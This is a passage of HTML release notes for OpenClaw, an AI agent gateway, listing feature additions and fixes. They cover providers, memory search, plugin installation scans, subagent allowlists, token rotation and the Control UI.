<li>CLI/models: route provider-filtered model listing through an explicit source plan so user config, installed manifest rows, Provider Index previews, and scoped runtime fallbacks keep a stable authority order without adding another catalog cache. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Providers: add Cerebras as a bundled plugin with onboarding, static model catalog, docs, and manifest-owned endpoint metadata.</li>
<li>Memory/OpenAI-compatible: add optional <code>memorySearch.inputType</code>, <code>queryInputType</code>, and <code>documentInputType</code> config for asymmetric embedding endpoints, including direct query embeddings and provider batch indexing. Carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4226871410" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63313" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/63313/hovercard" href="https://github.com/openclaw/openclaw/pull/63313">#63313</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4203912952" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60727" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/60727/hovercard" href="https://github.com/openclaw/openclaw/issues/60727">#60727</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/HOYALIM/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/HOYALIM">@HOYALIM</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/prospect1314521/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/prospect1314521">@prospect1314521</a>.</li>
<li>Ollama/memory: add model-specific retrieval query prefixes for <code>nomic-embed-text</code>, <code>qwen3-embedding</code>, and <code>mxbai-embed-large</code> memory-search queries while leaving document batches unchanged. Carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4070329121" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/45013" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/45013/hovercard" href="https://github.com/openclaw/openclaw/pull/45013">#45013</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/laolin5564/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/laolin5564">@laolin5564</a>.</li>
<li>Plugins/providers: move pre-runtime model-id normalization, endpoint host metadata, OpenAI-compatible request-family hints, model-catalog aliases/suppressions, OpenAI stale Spark suppression, and reusable startup metadata snapshots into plugin manifests so core no longer carries bundled-provider routing tables or repeated manifest rebuilds. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/config: deprecate direct plugin config load/write helpers in favor of passed runtime snapshots plus transactional mutation helpers with explicit restart follow-up policy, scanner guardrails, runtime warnings, and revision-based cache invalidation.</li>
<li>Plugins/install: allow <code>OPENCLAW_PLUGIN_STAGE_DIR</code> to contain layered runtime-dependency roots, resolving read-only preinstalled deps before installing missing deps into the final writable root. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332156784" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72396" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72396/hovercard" href="https://github.com/openclaw/openclaw/issues/72396">#72396</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/liorb-mountapps/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/liorb-mountapps">@liorb-mountapps</a>.</li>
<li>Control UI: add a raw config pending-changes diff panel that parses JSON5, redacts sensitive values until reveal, and avoids fake raw-edit callbacks when opening the panel. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4041206573" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/39831" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/39831/hovercard" href="https://github.com/openclaw/openclaw/issues/39831">#39831</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4085689943" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48621" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/48621/hovercard" href="https://github.com/openclaw/openclaw/pull/48621">#48621</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4077071028" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/46654" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/46654/hovercard" href="https://github.com/openclaw/openclaw/pull/46654">#46654</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JiajunBernoulli/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JiajunBernoulli">@JiajunBernoulli</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BunsDev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BunsDev">@BunsDev</a>.</li>
<li>Control UI: polish the quick settings dashboard grid so common cards align across desktop, tablet, and mobile layouts without wasting horizontal space. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BunsDev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BunsDev">@BunsDev</a>.</li>
<li>Matrix/E2EE: add <code>openclaw matrix encryption setup</code> to enable Matrix encryption, bootstrap recovery, and print verification status from one setup flow. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gumadeiras/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gumadeiras">@gumadeiras</a>.</li>
<li>Agents/compaction: add an opt-in <code>agents.defaults.compaction.maxActiveTranscriptBytes</code> preflight trigger that runs normal local compaction when the active JSONL grows too large, requiring transcript rotation so successful compaction moves future turns onto a smaller successor file instead of raw byte-splitting history. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>CLI/migration: add <code>openclaw migrate</code> with plan, dry-run, JSON, pre-migration backup, onboarding detection, archive-only reports, a Claude Code/Desktop importer, and a Hermes importer for configuration, memory/plugin hints, model providers, MCP servers, skills, commands, and supported credentials. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a> and <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/NousResearch/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/NousResearch">@NousResearch</a>.</li>
</ul>
<h3>Fixes</h3>
<ul>
<li>Agents/LSP: terminate bundled stdio LSP process trees during runtime disposal and Gateway shutdown, so nested children such as <code>tsserver</code> do not survive stop or restart. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331967579" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72357" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72357/hovercard" href="https://github.com/openclaw/openclaw/issues/72357">#72357</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ai-hpc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ai-hpc">@ai-hpc</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bittoby/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bittoby">@bittoby</a>.</li>
<li>Gateway/device tokens: stop echoing rotated bearer tokens from shared/admin <code>device.token.rotate</code> responses while preserving the same-device token handoff needed by token-only clients before reconnect. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4264445683" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66773" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66773/hovercard" href="https://github.com/openclaw/openclaw/issues/66773">#66773</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MoerAI/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MoerAI">@MoerAI</a>.</li>
<li>Control UI/Talk: keep Google Live browser sessions on the WebSocket transport instead of falling back to WebRTC, validate browser Google Live WebSocket endpoints, cap Gateway relay sessions per browser connection, and remove stale browser-native voice buttons that did not use the configured Talk/TTS provider. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BunsDev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BunsDev">@BunsDev</a>.</li>
<li>Gateway/startup: reuse config snapshot plugin manifests for startup auto-enable, config validation, and plugin bootstrap planning, including authored source config and disabled setup-probe handling, so restrictive allowlists avoid duplicate manifest/config passes during boot. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Agents/subagents: enforce <code>subagents.allowAgents</code> for explicit same-agent <code>sessions_spawn(agentId=...)</code> calls instead of auto-allowing requester self-targets. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4336117666" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72827" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72827/hovercard" href="https://github.com/openclaw/openclaw/issues/72827">#72827</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/oiGaDio/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/oiGaDio">@oiGaDio</a>.</li>
<li>ACP/sessions_spawn: let explicit <code>sessions_spawn(runtime="acp")</code> bootstrap turns run while <code>acp.dispatch.enabled=false</code> still blocks automatic ACP thread dispatch. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4229973496" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63591" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63591/hovercard" href="https://github.com/openclaw/openclaw/issues/63591">#63591</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/moeedahmed/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/moeedahmed">@moeedahmed</a>.</li>
<li>CLI/update: install npm global updates into a verified temporary prefix before swapping the package tree into place, preventing mixed old/new installs and stale packaged files from breaking <code>openclaw update</code> verification. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Gateway: skip CLI startup self-respawn for foreground gateway runs so low-memory Linux/Node 24 hosts start through the same path as direct <code>dist/index.js</code> without hanging before logs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4334377532" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72720" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72720/hovercard" href="https://github.com/openclaw/openclaw/issues/72720">#72720</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sign-2025/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sign-2025">@sign-2025</a>.</li>
<li>Google Meet: route local Chrome joins through OpenClaw browser control, grant Meet media permissions, pin local Chrome audio defaults to <code>BlackHole 2ch</code>, and use the configured OpenClaw browser profile so joined agents no longer show <code>Permission needed</code> or use raw/default Chrome state. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DougButdorf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DougButdorf">@DougButdorf</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/oromeis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/oromeis">@oromeis</a>.</li>
<li>Plugins/discovery: follow symlinked plugin directories in global and workspace plugin roots while keeping broken links ignored and existing package safety checks in place. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4030788779" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/36754" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/36754/hovercard" href="https://github.com/openclaw/openclaw/issues/36754">#36754</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4334070522" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72695" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72695/hovercard" href="https://github.com/openclaw/openclaw/pull/72695">#72695</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4225496480" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63206" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/63206/hovercard" href="https://github.com/openclaw/openclaw/pull/63206">#63206</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Quackstro/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Quackstro">@Quackstro</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ming1523/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ming1523">@ming1523</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xsfX20/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xsfX20">@xsfX20</a>.</li>
<li>Plugins/install: skip test files and directories during install security scans while still force-scanning declared runtime entrypoints, so packaged test mocks no longer block plugin installs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4265051521" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66840" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66840/hovercard" href="https://github.com/openclaw/openclaw/issues/66840">#66840</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4267070478" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67050" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/67050/hovercard" href="https://github.com/openclaw/openclaw/pull/67050">#67050</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/saurabhjain1592/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/saurabhjain1592">@saurabhjain1592</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Magicray1217/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Magicray1217">@Magicray1217</a>.</li>
<li>Plugins/install: allow exact package-manager peer links back to the trusted OpenClaw host package during install security scans while continuing to block spoofed or nested escaping <code>node_modules</code> symlinks. Carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4319318874" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70819" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70819/hovercard" href="https://github.com/openclaw/openclaw/pull/70819">#70819</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fgabelmannjr/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fgabelmannjr">@fgabelmannjr</a>.</li>
<li>Plugins/install: resolve plugin install destinations from the active profile state dir across CLI, ClawHub, marketplace, local path, and channel setup installs, so <code>openclaw --profile &lt;name&gt; plugins install ...</code> no longer writes into the default profile. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4306498991" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69960" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69960/hovercard" href="https://github.com/openclaw/openclaw/issues/69960">#69960</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4306634637" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69971" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69971/hovercard" href="https://github.com/openclaw/openclaw/pull/69971">#69971</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/FrancisLyman/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/FrancisLyman">@FrancisLyman</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Sanjays2402/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Sanjays2402">@Sanjays2402</a>.</li>
<li>Plugins/registry: suppress duplicate-plugin startup warnings when a tracked npm-installed plugin intentionally overrides the bundled plugin with the same id. Carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4085889795" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48673" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/48673/hovercard" href="https://github.com/openclaw/openclaw/pull/48673">#48673</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/abdushsk/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/abdushsk">@abdushsk</a>.</li>
<li>Plugins/startup: reuse canonical realpath lookups throughout each plugin discovery pass, including package and manifest boundary checks, so Windows npm-global startups no longer repeat expensive path resolution for the same plugin roots. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4251504394" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65733" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65733/hovercard" href="https://github.com/openclaw/openclaw/issues/65733">#65733</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/welfo-beo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/welfo-beo">@welfo-beo</a>.</li>
<li>Gateway/proxy: pass <code>ALL_PROXY</code> / <code>all_proxy</code> into the global Undici env-proxy dispatcher and provider proxy-fetch helper while keeping SSRF trusted-proxy auto-upgrade on <code>HTTP_PROXY</code> / <code>HTTPS_PROXY</code> only, so gateway/provider calls honor all-proxy setups without weakening guarded fetches. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4062862928" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/43821" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/43821/hovercard" href="https://github.com/openclaw/openclaw/issues/43821">#43821</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4063492398" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/43919" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/43919/hovercard" href="https://github.com/openclaw/openclaw/pull/43919">#43919</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/RickyTong1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/RickyTong1">@RickyTong1</a>.</li>
<li>Reply/link understanding: keep media and link preprocessing on stable runtime entrypoints and continue with raw message content if optional enrichment fails, so URL-bearing messages are no longer dropped after stale runtime chunk upgrades. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4287281423" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68466" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68466/hovercard" href="https://github.com/openclaw/openclaw/issues/68466">#68466</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/songshikang0111/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/songshikang0111">@songshikang0111</a>.</li>
<li>Discord: persist routed model-picker overrides when the hidden <code>/model</code> dispatch succeeds but the bound thread session store is still stale, including LM Studio suffixed model ids. Carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4208328194" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61473" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/61473/hovercard" href="https://github.com/openclaw/openclaw/pull/61473">#61473</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Nanako0129/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Nanako0129">@Nanako0129</a>.</li>
<li>Nodes/CLI: add <code>openclaw nodes remove --node &lt;id|name|ip&gt;</code> and <code>node.pair.remove</code> so stale gateway-owned node pairing records can be cleaned without hand-editing state files.</li>
<li>Gateway: include the connecting client and fresh presence version in the initial <code>hello-ok</code> snapshot, so clients no longer need a follow-up event before seeing themselves online.</li>
<li>Docker: install the CA certificate bundle in the slim runtime image so HTTPS calls from containerized gateways no longer fail TLS setup after the <code>bookworm-slim</code> base switch. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4335522675" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72787" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72787/hovercard" href="https://github.com/openclaw/openclaw/issues/72787">#72787</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ryuhaneul/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ryuhaneul">@ryuhaneul</a>.</li>
<li>Providers/OpenRouter: remove retired Hunter Alpha and Healer Alpha static catalog rows and disable proxy reasoning injection for stale Hunter Alpha configs, so replies are not hidden when OpenRouter returns answer text in reasoning fields. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4063678295" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/43942" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/43942/hovercard" href="https://github.com/openclaw/openclaw/issues/43942">#43942</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/EvanDataForge/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/EvanDataForge">@EvanDataForge</a>.</li>
<li>Providers/reasoning: let Groq and LM Studio declare provider-native reasoning effort values, so Qwen thinking models receive <code>none</code>/<code>default</code> or <code>off</code>/<code>on</code> instead of OpenAI-only <code>low</code>/<code>medium</code> values. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4014930127" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/32638" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/32638/hovercard" href="https://github.com/openclaw/openclaw/issues/32638">#32638</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Aqu1bp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Aqu1bp">@Aqu1bp</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mgoulart/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mgoulart">@mgoulart</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Norpps/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Norpps">@Norpps</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BSTail/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BSTail">@BSTail</a>.</li>
<li>Local models: default custom providers with only <code>baseUrl</code> to the Chat Completions adapter and trust loopback model requests automatically, so local OpenAI-compatible proxies receive <code>/v1/chat/completions</code> without timing out. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4041547299" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/40024" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/40024/hovercard" href="https://github.com/openclaw/openclaw/issues/40024">#40024</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/parachuteshe/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/parachuteshe">@parachuteshe</a>.</li>
<li>Channels/message tool: surface Discord, Slack, and Mattermost <code>user:</code>/<code>channel:</code> target syntax in the shared message target schema and Discord ambiguity errors, so DM sends by numeric id stop burning retries before finding <code>user:&lt;id&gt;</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332209830" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72401" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72401/hovercard" href="https://github.com/openclaw/openclaw/issues/72401">#72401</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/garyd9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/garyd9">@garyd9</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/praveen9354/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/praveen9354">@praveen9354</a>.</li>
<li>Agents/tools: scope tool-loop detection history to the active run when available, so scheduled heartbeat cycles no longer inherit stale repeated-call counts from previous runs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4041859005" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/40144" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/40144/hovercard" href="https://github.com/openclaw/openclaw/issues/40144">#40144</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mattbrown319/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mattbrown319">@mattbrown319</a>.</li>
<li>Agents/subagents: preserve requester delivery for completion announces across different channel accounts, keep same-channel thread completions routed to the child thread, and fail closed instead of guessing a child binding when requester conversation signal is missing. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sfuminya/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sfuminya">@sfuminya</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/suyua9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/suyua9">@suyua9</a>.</li>
<li>Agents/status: persist the post-compaction token estimate from auto-compaction when providers omit usage metadata, so <code>/status</code> and session lists keep showing fresh context usage after compaction. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4275752212" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67667" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67667/hovercard" href="https://github.com/openclaw/openclaw/issues/67667">#67667</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4336026319" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72822" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72822/hovercard" href="https://github.com/openclaw/openclaw/pull/72822">#72822</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Jimmy-xuzimo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Jimmy-xuzimo">@Jimmy-xuzimo</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/skylight-9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/skylight-9">@skylight-9</a>.</li>
<li>Control UI: show loading, reload, and retry states when a lazy dashboard panel cannot load after an upgrade, so the Logs tab no longer appears blank on stale browser bundles. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332419371" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72450" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72450/hovercard" href="https://github.com/openclaw/openclaw/issues/72450">#72450</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sobergou/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sobergou">@sobergou</a>.</li>
